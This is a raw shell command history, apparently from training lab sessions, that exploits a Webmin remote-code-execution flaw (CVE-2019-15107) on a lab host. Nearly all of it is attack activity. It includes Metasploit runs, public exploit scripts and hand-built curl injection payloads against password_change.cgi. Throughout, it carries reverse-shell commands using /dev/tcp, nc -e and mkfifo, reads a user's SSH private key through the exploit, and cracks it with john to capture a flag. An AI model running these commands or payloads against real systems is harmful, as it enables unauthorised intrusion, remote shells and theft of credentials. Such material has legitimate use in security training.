pwd
ls -la
python3 ssh2john.py id_rsa > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
ssh 10.1.17.4
ssh eve@10.1.17.4
ssh -i id_rsa eve@10.1.17.4
chmod 0600 id_rsa
ssh -i id_rsa eve@10.1.17.4
cat top-secret/flag.txt
nmap -v -A -sV 172.18.1.5
nmap --help
nmap -sS -sU -T4 -A -v 172.18.1.5
sudo nmap -sS -sU -T4 -A -v 172.18.1.5
sudo nmap -sV -A -v 172.18.1.5
apt-get install nano
sudo apt-get install nano
cd /home/downloads
cd /home/kali/Downloads
ls
nano CVE_2019_15107.c
gcc CVE_2019_15107.c -o CVE_2019_15107 -lcurl
sudo apt-get install libcurl-dev
sudo apt-get install libcurl4-openssl-dev
gcc CVE_2019_15107.c -o CVE_2019_15107 -lcurl
ls
./CVE_2019_15107
./CVE_2019_15107
gcc CVE_2019_15107.c -o CVE_2019_15107 -lcurl
sudo ./CVE_2019_15107
nano CVE_2019_15107.c
gcc CVE_2019_15107.c -o CVE_2019_15107 -lcurl
nano CVE_2019_15107.c
gcc CVE_2019_15107.c -o CVE_2019_15107 -lcurl
./CVE_2019_15107
sudo ./CVE_2019_15107
sudo curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall
help
cd /usr/share/metasploit-framework
ls
cd modules/
ls
nano webadmin_backdoor.rb
nano test.rb
sudo nano webadmin_backdoor
sudo nano webadmin_backdoor.rb
nmap 172.18.1.5
nmap -T4 -A -v 172.18.1.5
help
search 15107
use 0
172.18.1.5
target 172.18.1.5
help
exploit
set RHOSTS 172.18.1.5
exploit
set LHOST 0.0.0.0
exploit
set LHOST 10.1.135.83
nmap 192.168.131.*
nmap 192.168.131.*/17
nmap 172.18.1.*
nmap 192.168.131.*
nmap 10.1.0.*
nmap 172.18.*
nmap 172.18.*.*
nmap -T4 -A -v 172.18.1.*
nmap -T4 -A -v 192.168.131.*
exploit
nmap 172.18.1.5
nmap --help
nmap 172.18.1.5
nmap 172.18.1.5:10000
nmap --help
nmap 172.18.1.5 -u T:10000
nmap 172.18.1.5 -p T:10000
nmap 172.18.1.5 -sV -p T:10000
curl -O https://github.com/ruthvikvegunta/CVE-2019-15107.git
ls
cd cat CVE-2019-15107.git
cat CVE-2019-15107.git
curl https://github.com/ruthvikvegunta/CVE-2019-15107.git
ifconfig
python3 webmin_rce.py -t http://172.18.1.5:10000 -l 192.168.130.205 -p 8888
sudo python3 webmin_rce.py -t http://172.18.1.5:10000 -l 192.168.130.205 -p 8888
sudo python3 webmin_rce.py -t http://172.18.1.5:10000 -l 192.168.130.205 -p 12345
sudo python3 webmin_rce.py -t http://172.18.1.5:10000
ifconfig
sudo python3 webmin_rce.py -t http://172.18.1.5:10000 -l 10.1.135.83 -p 8888
nmap 172.18.1.5
nmap -v -A 172.18.1.5
nmap -v -A 172.18.1.5 -p10000
nikto -h 172.18.1.5 -p 10000
nmap -sV 172.18.1.5
ssh 172.18.1.5
gobuster dir -u http://172.18.1.5/ -w /sips/sipssys/users/a/admin/user
apt install gobuster
sudo su
apt install gobuster
gobuster dir -u http://172.18.1.5/ -w /sips/sipssys/users/a/admin/user
metasploit
sudo msfdb init
sudo msfdb
sudo msfdb start
sudo msfdb run
use exploit/linux/http/webmin_backdoor
exploit
run
set RHOSTS 172.18.1.5
run
set LHOST 10.1.135.83
run
exit
msfconsole
search webmin
nmap 172.18.1.5
nmap -sV -sC 172.18.1.5
searchsploit webmin
clear
msfconsole -q
search webmin
search cve-2019-15107
use 0
show options
set rhosts 172.18.1.5
show options
set payload
clear
set payload windows/meterpreter/reverse_tcp
show options
ip a
set lhost 10.1.135.83
run
exit
exit
msfconsole -q
search cve-2019-15107
use 0
set rhosts 172.18.1.5
show options
set lhost 10.1.135.83
run
sessions -i
run
exit
clear
msfconsole -q
search cve-2019-15107
use 0
show options
set lhost 10.1.135.83
show options
set rhosts 172.18.1.5
run
clear
nmap -p- 172.18.1.0/24
nano id_rsa
chmod 600 id_rsa
locate ssh2john
python /home/kali/ssh2john.py id_rsa > id_rsa.hash
ls
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
ssh -i id_rsa eve@10.17.1.4
chmod 600 id_rsa.hash
chmod 600 id_rsa
ssh -i id_rsa eve@10.17.1.4
ssh -i id_rsa bob@10.17.1.4
clear
ssh -i id_rsa eve@10.17.1.4
ls
cat id_rsa
clear
ssh -i id_rsa eve@10.17.1.4
ping 10.17.1.4
cat id_rsa
chmod 600 id_rsa
ssh -i id_rsa eve@10.17.1.4
clear
ls
clear
clear
clear
clear
clear
chmod 0600 id_rsa
ssh -i id_rsa eve@10.17.1.4
ssh -i id_rsa eve@10.1.17.4
clear
ls
cd top-secret/
ls
cat flag.txt
nmap 172.18.1.5
nmap -v -A -sV 172.18.1.5
nmap -sp 172.18.1.5
-cve
./webmin-CVE-2019-15107.sh 10.10.73.185 'uname -a'
nmap -sC -sV -p 10000 172.18.1.5
nc -lnvp 10000
sudo su
msfconsole
search webmin
use 5
info
set RHOST 10.10.127.20
set SSL true
set LHOST tun0
show options
run
amp
nmap 172.18.1.15
namp 172.18.1.15
namp 100.100.100.41
sudo su apt install namp
nmap
nmap -A 172.18.1.15
namp -sV 172.18.1.5
nmap -sV 172.18.1.15
Pn 172.18.1.15
namp -help
namp --help
nmap
nmap -sV -sc 172.18.1.15
nmap -sV 172.18.1.5
ping 172.18.1.5
nslookup 172.18.1.5
nmap -sU -v 172.18.1.5
sudo nmap -sU -v 172.18.1.5
sudo nmap -sU 172.18.1.5
sudo nmap -P 1000 -sU -v 172.18.1.5
ssh 172.18.1.5
ifconfig
ls
cat ssh2john.py
python3 ssh2john.py
touch exploit.py
vim exploit.py
sudo vim exploit.py
sudo vim exploit.rb
nmap -v -A -sV
nmap -v -A -sV 172.18.1.5
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall
/opt/metasploit-framework/bin/msfconsole
use exploit/unix/cve-2019-15107
use exploit/linux/cve_78_backdoor
use exploit/unix/cve-2019-15107_backdoor
use exploit/linux/webmin_78_backdoor
info exploit/kali
info exploit/lunix
use exploit/linux/Webmin_78_backdoor
exploit wemin
show options
use exploit Webmin
show options
use exploit/unix/webapp/webmin_show_cgi_exec
0
Webmin 1.500
show options
exploit
run
exit
/opt/metasploit-framework/bin/msfconsole
use exploit/linux
use exploit/linux/http/webmin_backdoor
use exploit/linux/http
use exploit
use exploit/Webmin
use exploit/linux/http/webmin
cd /root
loadpath
exploit
options
show options
set RHOSTS 172.18.1.5
exploit
set LHOST 10.1.135.83
ipconfig /all
ifconfig /all
nmap -v -A -sV 172.18.1.5
- nikto
- Nikto ?
- Nikto
netdiscover -r 172.18.1.5
sudo netdiscover -r 172.18.1.5
nmap -A 172.18.1.5
msfconsole
nmap -A 172.18.1.5
search Webmin
info 5
use exploit/linux/http/webmin_backdoor
bash use exploit/linux/http/webmin_backdoor
search Webmin
sho options
show options
set RHOST 172.18.1.5
exploit
exploit
mfsconsole
sudo mfsconsole
whoami
msfconsole
bashsearch Wbmin
search Webmin
use exploit/linux/http/webmin_backdoor
sho options
show options
set RHOST 172.18.1.5
exploit
whoami
exploit
RHOST ?
tracert 172.18.1.5
?
set RHOSTS 172.18.1.5
exploit
sho options
show options
set RHOSTS 172.18.1.5
exploit
whoami
?
pwd
msfconsole
show Wemin
show Webmin
search Webmin
use exploit/linux/http/wemin_backdoor
use exploit/linux/http/webmin_backdoor
show options
set RHOSTS 172.18.1.5
exploit
run
show options
set RHOST 0.0.0.0
exploit
run
set RHOST 172.18.1.5
run
pwd
show options
set RHOST 172.18.1.5
exploit
info
set RHOST 172.18.1.5
set SSL true
set LHOST
set LHOST tun0
sho options
show options
ifconfig
lhost
set LHOST 10.1.135.83
exploit
set SSL false
dpkg
dpkg -i ipscan_3.4_i386.deb
sudo dpkg -i ipscan_3.4_i386.deb
nmap -v -sv 172.18.1.5
nmap  172.18.1.5
nmap -v  172.18.1.5
nmap -cv  172.18.1.5
nmap -sv  172.18.1.5
nmap -s  172.18.1.5
nmaps  172.18.1.5
nmap   172.18.1.5
nmap   -v 172.18.1.5
nmap   -v -A -sv  172.18.1.5
nmap   -v -A   172.18.1.5
cd root
cd ..
cd ..
cd root
list
oikdir
dir
cd / rooty
cd /root
sudo cd /root
sudo cd /root/
dir
cd Do
cd Downloads
dir
./CVE-2019-1507.sh
CVE-2019-1507.sh
sh CVE-2019-1507.sh https://172.18.1.5:10000
dir
sh CVE-2019-15107.sh https://172.18.1.5:10000
sh CVE-2019-15107.sh https://172.18.1.5
sh CVE-2019-15107.sh https://172.18.1.5:10000
wget https://netix.dl.sourceforge.net/project/webadmin/webmin/1.920/webmin_1.920_all.deb
sudo wget https://netix.dl.sourceforge.net/project/webadmin/webmin/1.920/webmin_1.920_all.deb
dpkg -i webmin_1.920_all.deb
sudo dpkg -i webmin_1.920_all.deb
sudo sed -i s/passwd_mode=0/passwd_mode=2/g /etc/webmin/miniserv.conf;service webmin restart
sudo sed -i s/passwd_mode=0/passwd_mode=2/g /etc/webmin/miniserv.conf;service webmin restart
systemcrl status webmin.service
systemctl status webmin.service
sudo sed -i s/passwd_mode=0/passwd_mode=2/g /etc/webmin/miniserv.conf
dpkg -i webmin_1.920_all.deb
sudo dpkg -i webmin_1.920_all.deb
sudo dpkg -i webmin_1.920_all.deb -f
sudo dpkg -i -f webmin_1.920_all.deb
sudo dpkg  -f webmin_1.920_all.deb
sudo dpkg  -f webmin_1.920_all.deb
sudo dpkg -i webmin_1.920_all.deb -f
sudo dpkg -i webmin_1.920_all.deb -f
sudo dpkg -i webmin_1.920_all.deb
apt-get install libauthen-pam-perl
sudo apt-get install libauthen-pam-perl
sudo apt-get install libauthen-pam-perl  --fix-broken install
sudo apt-get install libauthen-pam-perl  --fix-broken
sudo apt-get install --fix-broken install
sudo apt-get install --fix-broken libauthen-pam-perl
sudo apt-get install --fix-broken libio-pty-perl but
sudo apt-get install --fix-broken libio-pty-perl
sudo dpkg -i webmin_1.920_all.deb
wget https://netix.dl.sourceforge.net/project/webadmin/webmin/1.920/webmin_1.920_all.deb
sudo dpkg -i webmin_1.920_all.deb
sudo dpkg -?  webmin_1.920_all.deb
sudo dpkg -b  webmin_1.920_all.deb
sudo dpkg   webmin_1.920_all.deb
apt-get install  webmin_1.920_all.deb
apsudo t-get install  webmin_1.920_all.deb
sudo apt-get install  webmin_1.920_all.deb
wget https://netix.dl.sourceforge.net/project/webadmin/webmin/1.920/webmin_1.920_all.deb
ping
ping 172.18.1.5
traceroute 172.18.1.5
nmap -v -sn 172.18.1.5
nmap -v -sn 172.18.1.5
nmap -T4 -A -v 172.18.1.5
curl 172.18.1.5:1000
curl 172.18.1.5:10000
ssh admin@172.18.1.5
ssh root@172.18.1.5
nmap -sV 172.18.1.5
git clone https://github.com/jas502n/CVE-2019-15107
cd CVE-2019-15107
ls
python CVE_2019_15107.py
python CVE_2019_15107.py http://172.18.1.5:10000 bash
python CVE_2019_15107.py http://172.18.1.5:10000 sh
python CVE_2019_15107.py http://172.18.1.5:10000
python CVE_2019_15107.py https://172.18.1.5:10000 cmd
python CVE_2019_15107.py https://172.18.1.5:10000 /bin.sh
python CVE_2019_15107.py https://172.18.1.5:10000 /bin/sh
python CVE_2019_15107.py http://172.18.1.5:10000 /bin/sh
python CVE_2019_15107.py 172.18.1.5:10000 /bin/sh
python CVE_2019_15107.py 172.18.1.5:10000 sh
python CVE_2019_15107.py http://172.18.1.5:10000 sh
python CVE_2019_15107.py http://172.18.1.5:10000 ls
python CVE_2019_15107.py http://172.18.1.5:10000 ls /
python CVE_2019_15107.py http://172.18.1.5:10000 /bin/bash
python CVE_2019_15107.py http://172.18.1.5:10000 id
python CVE_2019_15107.py http://172.18.1.5:10000 sh
nc -lnvp 1234 && python CVE_2019_15107.py http://172.18.1.5:10000 nc -e /bin/sh 10.1.135.83 1234
nc -lnvp 1234
python CVE_2019_15107.py http://172.18.1.5:10000 nc -e /bin/sh 10.1.135.83 1234
python CVE_2019_15107.py http://172.18.1.5:10000 "nc -e /bin/sh 10.1.135.83 1234"
nc -lnvp 1234
python CVE_2019_15107.py http://172.18.1.5:10000 "nc -e /bin/bash 10.1.135.83 1234"
nc -lnvp 1234
python CVE_2019_15107.py http://172.18.1.5:10000 "bash -i >& /dev/tcp/10.1.135.83/1234 0>&1"
python CVE_2019_15107.py http://172.18.1.5:10000 "bash -i >& /dev/tcp/10.1.135.83/1234 0>&1"
python CVE_2019_15107.py http://172.18.1.5:10000 "bash -i >& /dev/tcp/10.1.135.83/1234 0>&1"
python CVE_2019_15107.py http://172.18.1.5:10000 "nc -e /bin/bash 10.1.135.83 1234"
nc -lnvp 1234
python CVE_2019_15107.py http://172.18.1.5:10000 "bash -i >& /dev/tcp/10.1.135.83/1234 0>&1"
python CVE_2019_15107.py http://172.18.1.5:10000 "bash -i >& /dev/tcp/10.1.135.83/1234 0>&1 &"
python CVE_2019_15107.py http://172.18.1.5:10000 "exec bash -i >& /dev/tcp/10.1.135.83/1234 0>&1"
python CVE_2019_15107.py http://172.18.1.5:10000 "bash -i >& /dev/tcp/10.1.135.83/1234 0>&1 &"
python CVE_2019_15107.py http://172.18.1.5:10000 "bash -i >& /dev/tcp/10.1.135.83/1234 0>&1"
python CVE_2019_15107.py http://172.18.1.5:10000 "sh -i >& /dev/tcp/10.1.135.83/1234 0>&1"
python CVE_2019_15107.py http://172.18.1.5:10000 "/bin/bash -i >& /dev/tcp/10.1.135.83/1234 0>&1"
python CVE_2019_15107.py http://172.18.1.5:10000 "nc -e /bin/bash 10.1.135.83 1234"
nc -lnvp 1234
python CVE_2019_15107.py http://172.18.1.5:10000 "0<&196;exec 196<>/dev/tcp/100.1.135.83/1234; sh <&196 >&196 2>&196"
python CVE_2019_15107.py http://172.18.1.5:10000 "0<&196;exec 196<>/dev/tcp/10.1.135.83/1234; sh <&196 >&196 2>&196"
python CVE_2019_15107.py http://172.18.1.5:10000 "0<&196;exec 196<>/dev/tcp/10.1.135.83/1234; bash <&196 >&196 2>&196"
python CVE_2019_15107.py http://172.18.1.5:10000 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.1.135.83 1234 >/tmp/f"
python CVE_2019_15107.py http://172.18.1.5:10000 "nc -e /bin/bash 10.1.135.83 1234"
nc -lnvp 1234
python CVE_2019_15107.py http://172.18.1.5:10000 "cat /home/debian/.ansible"
python CVE_2019_15107.py http://172.18.1.5:10000 "cat /home/debian/.bashc"
python CVE_2019_15107.py http://172.18.1.5:10000 "cat /home/debian/.bashrc"
python CVE_2019_15107.py http://172.18.1.5:10000 "ls -la /home/eve"
python CVE_2019_15107.py http://172.18.1.5:10000 "cat /home/eve/.swp"
python CVE_2019_15107.py http://172.18.1.5:10000 "cat /home/eve/.ssh"
python CVE_2019_15107.py http://172.18.1.5:10000 "ls -la /home/eve"
python CVE_2019_15107.py http://172.18.1.5:10000 "cat /home/eve/.bash_history"
python CVE_2019_15107.py http://172.18.1.5:10000 "ls -la /home/eve"
python CVE_2019_15107.py http://172.18.1.5:10000 "ls -la /etc/services"
python CVE_2019_15107.py http://172.18.1.5:10000 "ls -la /etc"
python CVE_2019_15107.py http://172.18.1.5:10000 "ls -la /home/eve"
python CVE_2019_15107.py http://172.18.1.5:10000 "ls -la /home/debian"
python CVE_2019_15107.py http://172.18.1.5:10000 "cat /home/debian/.gnupg"
python CVE_2019_15107.py http://172.18.1.5:10000 "ls -la /home/eve"
python CVE_2019_15107.py http://172.18.1.5:10000 "ls -la /"
python CVE_2019_15107.py http://172.18.1.5:10000 "ls -la /root"
python CVE_2019_15107.py http://172.18.1.5:10000 "cat /root/.gnupg"
python CVE_2019_15107.py http://172.18.1.5:10000 "ls -la /"
python CVE_2019_15107.py http://172.18.1.5:10000 "ls -la /src"
python CVE_2019_15107.py http://172.18.1.5:10000 "ls -la /srv"
python CVE_2019_15107.py http://172.18.1.5:10000 "ls -la /"
python CVE_2019_15107.py http://172.18.1.5:10000 "ls -la /tmp"
python CVE_2019_15107.py http://172.18.1.5:10000 "ls -la /"
python CVE_2019_15107.py http://172.18.1.5:10000 "ls -la /mnt"
python CVE_2019_15107.py http://172.18.1.5:10000 "ls -la /"
python CVE_2019_15107.py http://172.18.1.5:10000 "ls -la /etc"
python CVE_2019_15107.py http://172.18.1.5:10000 "ls -la /etc/cloud"
python CVE_2019_15107.py http://172.18.1.5:10000 "cat /etc/cloud/cloud.cfg"
python CVE_2019_15107.py http://172.18.1.5:10000 "ls -la /home/eve"
python CVE_2019_15107.py http://172.18.1.5:10000 "ls -la /home/bob"
python CVE_2019_15107.py http://172.18.1.5:10000 "ls -la /home/alice"
python CVE_2019_15107.py http://172.18.1.5:10000 "ls -la /home/debian"
python CVE_2019_15107.py http://172.18.1.5:10000 "ls -la /etc/ssh"
python CVE_2019_15107.py http://172.18.1.5:10000 "cat /etc/ssh/ssh_config"
python CVE_2019_15107.py http://172.18.1.5:10000 "ls -la /home/eve/.ssh"
python CVE_2019_15107.py http://172.18.1.5:10000 "cat /home/eve/.ssh/id_rsa"
vim key
ssh eve@10.1.17.4 -h
ssh eve@10.1.17.4 -i key
chmod 0600 key
ssh eve@10.1.17.4 -i key
ssh eve@10.1.17.4 -i key
ls
ls -la
cd top-secret/
ls
ls -la
cat flag.txt
ping 172.18.1.5
ssh
sudo apt-get install wireshark
whoami
ipconfig
ip config
ip
ip config -a
ifconfig -a
sudo nmap -sTU -O 172.18.1.5
sudo nmap 172.18.1.5
sudo apt install metasploit-framework
msf > use exploit/unix/webapp/webmin_backdoor
msf
msf
msfconsole -q
j
msf > use exploit/unix/webapp/webmin_backdoor
db_status
msf >
msfconsole
Yes
msfconsole
ifconfig -a
ping 172.18.1.5
nmap 172.18.1.5
nmap -sv 172.18.1.5
nmap -sV 172.18.1.5
msfconsole
show exploits
grep webmin search
grep http search webmin
use exploit/linux/http/webmin_packageup_rce
show options
ifconfig
set lhost 147.251.124.170
set rhost 172.18.1.5
exploit
exit
searchsploit webmin 1.920
cp /usr/share/exploitdb/exploits/linux/webapps/47293.sh /root/Desktop
msfconsole
search webmin 1.920
use exploit/linux/http/webmin_backdoor
show options
set Rhost 172.18.1.5
run
set Lhost 10.1.135.83
run
nmap 172.18.1.0/24
msfconsole
search webmin 1.920
use exploit/linux/http/webmin_backdoor
set RHOST 172.18.1.5
set LHOST 10.1.135.83
run
ping 172.18.1.5
netstat -a
netstat
netstat 172.18.1.5
nmap 172.18.1.5
nmap -sT 172.18.1.5
nmap
nmap -r 172.18.1.5
nmap -sS 172.18.1.5
nmap 172.18.1.5
nmap 172.18.1.1
nmap -sV 172.18.1.5
msfconsle
msfconsole
tips
help
connect 172.18.1.5
connect 172.18.1.5 1000
connect 172.18.1.5 10000
search webmin 1.920
use webmin 1.920
use exploit/47230
set RHOST 172.18.1.5
set LHOST 10.1.135.83
set LPORT 10000
Nmap
nmap -sS -Pn -sC -sV - -script -p- -T4 172.18.1.5
sudo su
nmap -sS -Pn -sC -sV - -script -p- -T4 172.18.1.5
nmap -sS -Pn -sC -sV -T4 172.18.1.5
ssh 172.18.1.5
webmin
search cve:2009
search CVE-2019-08-06
search CVE-2019-15107
use 0
use exploit/linux/hhtp/webmin_backdoor
use
use exploit/linux/http/webmin_back
run
run 172.18.1.5
run -t 172.18.1.5:10000
run -t 172.18.1.5
options
SRVHOST 172.18.1.5
options
set Target 172.18.1.5
option
options
run
set RHOSTS 172.18.1.5
run
options
set SRVHOST 172.18.1.5
run
options
set LHOST 10000
run
run 172.18.1.5
options
set Target 172.18.1.5
run
run target
options
explpoit
exploit
options
set SRVHOST 0.0.0.0
run
help
check 172.18.1.5
search CVE-2019-15107
use 0
run
options
set RHOSTS 172.18.1.5
options
set TARGETURI /
run
whoami
set LHOST 0.0.0.0
run
whoami
set LHOST 172.18.1.5
run
options
set LHOST 10.1.135.82
run
whoami
set LPORT 10000
run
options
set LHOST 10.1.135.83
nmap -sS -Pn -sC -sV -T4
ipdiscovery
ifconfig
namp -sL 172.0.0.0/24
namp -sL 172.18.1.0/24
nmap -sL 172.18.1.0/24
nmap -sL 172.18.1.0/16
nmap -p- 172.18.1.5
nmap -p 10000 -sV 127.18.1.5
nmap -p 10000 -sV 172.18.1.5
msfconsole
search Miniserv 1.920
search Webmin
search Webmin 1.920
ls
cd Downloads
ls
nano 47293.sh
use 0
show options
nano 47293.ship a
ip a
set LHOST 10.1.135.83
set RHOSTS 172.18.1.5
show options
exploit
use exploit/multi/handler
show options
search Webmin 1.920
ls
nano 47293.sh
sh 47293.sh 172.18.1.15:10000
rm 47293.sh
sh 47293.sh 172.18.1.15:10000
nano 47293.sh
sh 47293.sh http://172.18.1.15:10000
sh 47293.sh https://172.18.1.15:10000
exit
use 0
set LHOST 10.1.135.83
set RHOSTS 172.18.1.5
exploit
cd Downloads
ls
sh 47293.sh
whoami
id
ifconfig
sudo nmap -sn 172.18.1.15
sudo nmap -sn 172.18.1.5
sudo nmap -sn 172.18.1.5/24
sudo nmap -sC -sV 172.18.1.5
sudo nmap -sC -sV -p- 172.18.1.5
searchsploit Miniserv 1.920
searchsploit Miniserv
searchsploit webmin
searchsploit webmin 1.920
cd Desktop
searchsploit -x linux/webapps/47293.sh
searchsploit -m linux/webapps/47293.sh
ls -lA
nano 47293.sh
bash 47293.sh
sh 47293.sh
nano 47293.sh
sh 47293.sh https://172.18.1.5:10000
nano 47293.sh
cd Desktop
nano 47293.sh
nano 47293.sh
curl -ks 172.18.1.5:1000
sudo nmap -sC -sV 172.18.1.5
curl -ks curl -ks jttp://172.18.1.5:10000
curl -ks curl -ks http://172.18.1.5:10000
curl -ks curl -ks https://172.18.1.5:10000
curl -ks curl -ks http://172.18.1.5:10000
curl -ks http://172.18.1.5:10000
cat 47293.sh
bash 47293.sh http://172.18.1.5:10000
searchsploit webmin 1.920
searchsploit -m linux/remote/47230.rb
nano 47230.rb
ruby 47230.rb
ruby 47230.rb --help
cat 47293.sh
curl -ks 'http://172.18.1.5:1000/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo f3a0c13c3765137bcde68572707ae5c0&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: http://172.18.1.5:1000/session_login.cgi'|grep $FLAG>/dev/null 2>&1
curl -ks 'http://172.18.1.5:1000/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo f3a0c13c3765137bcde68572707ae5c0&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: http://172.18.1.5:1000/session_login.cgi'|grep f3a0c13c3765137bcde68572707ae5c0 >/dev/null 2>&1
curl -ks 'http://172.18.1.5:1000/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo f3a0c13c3765137bcde68572707ae5c0&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: http://172.18.1.5:1000/session_login.cgi'|grep f3a0c13c3765137bcde68572707ae5c0 >/dev/null 2>&1
curl -ks 'http://172.18.1.5:1000/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo f3a0c13c3765137bcde68572707ae5c0&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: http://172.18.1.5:1000/session_login.cgi'|grep f3a0c13c3765137bcde68572707ae5c0
curl -ks 'http://172.18.1.5:1000/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo f3a0c13c3765137bcde68572707ae5c0&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: http://172.18.1.5:1000/session_login.cgi' | grep 'f3a0c13c3765137bcde68572707ae5c0'
curl -ks 'http://172.18.1.5:1000/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo f3a0c13c3765137bcde68572707ae5c0&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: http://172.18.1.5:1000/session_login.cgi'
nano test
ping 8.8.8.8
ls -lA
python3 CVE_2019_15107.py
python CVE_2019_15107.py
python CVE_2019_15107.py http://172.18.1.5:1000
python CVE_2019_15107.py http://172.18.1.5:1000 id
nano CVE_2019_15107.py
nano CVE_2019_15107.py
nano CVE_2019_15107.py
python CVE_2019_15107.py http://172.18.1.5:1000 cmd
cat webmin_rce.py
nc -lnvp 8888
python3 webmin_rce.py -t http://172.18.1.5:10000 -l 172.18.1.1 -p 8888
curl -ks 'http://172.18.1.5:10000/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo f3a0c13c3765137bcde68572707ae5c0&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: http://172.18.1.5:10000/session_login.cgi'
curl -ks 'http://172.18.1.5:10000/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo f3a0c13c3765137bcde68572707ae5c0&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: http://172.18.1.5:10000/session_login.cgi' | grep f3a0c13c3765137bcde68572707ae5c0
curl -ks 'http://172.18.1.5:10000/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=whoami|echo f3a0c13c3765137bcde68572707ae5c0&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: http://172.18.1.5:10000/session_login.cgi' | grep f3a0c13c3765137bcde68572707ae5c0
cat 47293.sh
curl -ks 'http://172.18.1.5:10000/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=whoami|echo f3a0c13c3765137bcde68572707ae5c0&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: http://172.18.1.5:10000/session_login.cgi' | grep f3a0c13c3765137bcde68572707ae5c0 >/dev/null 2>&1
curl -ks 'http://172.18.1.5:10000/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=whoami|echo f3a0c13c3765137bcde68572707ae5c0&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: http://172.18.1.5:10000/session_login.cgi'
curl -ks 'http://172.18.1.5:10000/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo f3a0c13c3765137bcde68572707ae5c0&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: http://172.18.1.5:10000/session_login.cgi'
ifconfig
nc -lnvp 8888
curl -ks 'http://172.18.1.5:10000/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=bash -i >& /dev/tcp/192.168.131.119/8888 0>&1|echo f3a0c13c3765137bcde68572707ae5c0&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: http://172.18.1.5:10000/session_login.cgi'
curl -ks 'http://172.18.1.5:10000/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=bash -i >& /dev/tcp/10.1.135.83/8888 0>&1|echo f3a0c13c3765137bcde68572707ae5c0&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: http://172.18.1.5:10000/session_login.cgi'
curl -ks 'http://172.18.1.5:10000/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=bash -i >& /dev/tcp/172.18.1.5/8888 0>&1|echo f3a0c13c3765137bcde68572707ae5c0&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: http://172.18.1.5:10000/session_login.cgi'
curl -ks 'http://172.18.1.5:10000/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=bash -i >& /dev/tcp/172.18.1.1/8888 0>&1|echo f3a0c13c3765137bcde68572707ae5c0&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: http://172.18.1.5:10000/session_login.cgi'
sudo nmap -sC -sV -p- 172.18.1.5
sudo nmap 172.18.1.5/24
curl -ks 'http://172.18.1.5:10000/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=bash -i >& /dev/tcp/10.1.135.83/8888 0>&1|echo f3a0c13c3765137bcde68572707ae5c0&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: http://172.18.1.5:10000/session_login.cgi'
nc -lnvp 8888
